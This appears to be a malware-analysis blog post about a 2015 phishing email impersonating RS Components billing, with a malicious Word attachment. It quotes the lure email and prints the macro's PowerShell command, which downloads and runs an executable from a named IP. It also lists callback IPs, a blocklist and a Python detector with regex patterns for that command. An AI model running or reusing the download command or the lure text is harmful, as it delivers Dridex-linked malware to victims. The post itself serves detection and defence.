---------------------------------------------------------------
From: Earlene Carlson
Date: 31 March 2015 at 11:30
Subject: 83433-Your Latest Documents from RS Components 659751716
Helping you get your job done. You've received this email as a customer of rswww.com.
Dear Customer, Please find attached your latest document(s) from RS.
For all account queries please contact RS Customer Account Services.
Tel: 01536 752867
Fax: 01536 542205
Email: rpdf.billing@colt.net (subject box to read DOC eBilling)
If you have any technical problems retrieving your documents please contact Swiss Post Solutions Helpdesk on the following:
Tel: 0333 8727520
Email: customers@colt.net
Kind regards,
RS Customer Account Services.
This service is provided by Swiss Post Solutions on behalf of RS Components.
RS Components Ltd, Birchington Road, Weldon, Corby, Northants, NN17 9RS, UK. Registered No. 1002091. http://rswww.com. RS Online Help: 01536 752867.
---------------------------------------------------------------
The reference numbers, names and email addresses vary, but all come with a malicious and apparently randomly-named attachment (e.g. G-A6298638294134271075684-1.doc).
There are probably several different variants of this, but I have seen just one working example of the attachment which contains this malicious macro [pastebin] which executes the following command:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://185.91.175.64/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;
For some reason, the EXE is downloaded from http://185.91.175.64/jsaxo8u/g39b2cx.exe with a CAB extension and then run through EXPAND which.. errr.. does nothing much. The file is saved as %TEMP%\4543543.exe, and it has a VirusTotal detection rate of 3/57.
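As an added example (not from the original post), the indicators in that command line can be turned into a simple detector to run over process-creation logs; the benign log lines and the alert threshold below are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Indicators taken from the macro's command line analysed above, written as
# patterns to run over process-creation command lines (e.g. Sysmon event 1
# or Windows 4688 logs). The benign sample lines below are constructed.
INDICATORS = {
    "execpolicy_bypass": re.compile(r"-ExecutionPolicy\s+bypass", re.I),
    "noprofile": re.compile(r"-noprofile\b", re.I),
    "webclient_downloadfile": re.compile(r"Net\.WebClient\)\.DownloadFile\(", re.I),
    "cab_dropped_in_temp": re.compile(r"%TEMP%\\[^\s'\";]+\.cab", re.I),
    "expand_then_start": re.compile(r"\bexpand\b.*\bstart\b.*\.exe", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\";]+", re.I)
# Download host seen in the macro plus the IPs the post recommends blocking.
KNOWN_BAD = {"185.91.175.64", "188.120.225.17", "1.164.114.195",
             "2.194.41.9", "46.19.143.151", "199.201.121.169"}

def analyse_command(cmdline):
    """Return which downloader indicators a command line matches."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    hosts = [urlsplit(u).hostname for u in URL_RE.findall(cmdline)]
    bad_hosts = sorted(set(hosts) & KNOWN_BAD)
    # Two independent indicators, or any known-bad host, is enough to alert
    # (threshold chosen for this example; tune it to your environment).
    return {"hits": hits, "hosts": hosts, "bad_hosts": bad_hosts,
            "alert": len(hits) >= 2 or bool(bad_hosts)}

def scan_log(lines):
    """Yield (line_number, result) for lines that should raise an alert."""
    for n, line in enumerate(lines, 1):
        result = analyse_command(line)
        if result["alert"]:
            yield n, result

SAMPLE_LOG = [
    # the macro's command as quoted in the post
    "cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://185.91.175.64/jsaxo8u/g39b2cx.exe','%TEMP%\\4543543.cab'); expand %TEMP%\\4543543.cab %TEMP%\\4543543.exe; start %TEMP%\\4543543.exe",
    # constructed benign admin activity that shares single indicators
    "powershell.exe -noprofile -File C:\\scripts\\inventory.ps1",
    "cmd /C expand D:\\drivers\\net.cab C:\\drivers\\net.sys",
]

if __name__ == "__main__":
    for n, r in scan_log(SAMPLE_LOG):
        print(n, r["hits"], r["bad_hosts"])
```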
Analysis is still pending, but the VirusTotal report does indicate that the malware phones home to 188.120.225.17 (TheFirst-RU, Russia), which I strongly recommend blocking. Check back for more updates later.
UPDATE:
Automated analysis [1] [2] [3] [4] shows attempted connections to the following IPs:
188.120.225.17 (TheFirst-RU, Russia)
1.164.114.195 (Data Communication Business Group, Taiwan)
2.194.41.9 (Telecom Italia Mobile, Italy)
46.19.143.151 (Private Layer INC, Switzerland)
199.201.121.169 (Synaptica, Canada)
It also drops another version of the downloader binary called edg1.exe with a 2/57 detection rate plus a Dridex DLL with a detection rate of 1/57.
Recommended blocklist:
188.120.225.17
1.164.114.195
2.194.41.9
46.19.143.151
199.201.121.169